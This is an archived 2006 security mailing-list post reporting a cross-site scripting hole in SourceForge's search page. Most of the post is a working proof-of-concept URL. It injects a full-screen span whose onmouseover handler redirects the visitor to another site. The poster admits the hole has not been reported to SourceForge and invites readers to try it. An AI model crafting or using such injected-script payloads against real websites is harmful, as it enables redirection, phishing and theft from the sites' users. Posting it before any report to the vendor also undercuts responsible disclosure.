|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Sourceforge.net XSS
the.spikey
gmail.com
Date: Sun Apr 09 2006 - 13:13:31 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hey guys,
I found this kind of 'hole' in sf.net, you can exucute some code, not all.(i.e. you cannot use a / )
I have not reported this yet, i'm sorry :+
Try it out:
http://sourceforge.net/search/?type_of_search=soft&forum_id=0&group_id=0&atid=0&words=<span style="position: fixed; top: 0px; left: 0px; color: red; width: 1000px; height: 1000px" onmouseOver="javascript:window.location='http://www.google.nl'">&Search=Search
Spiked
www.geekshangout.org
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]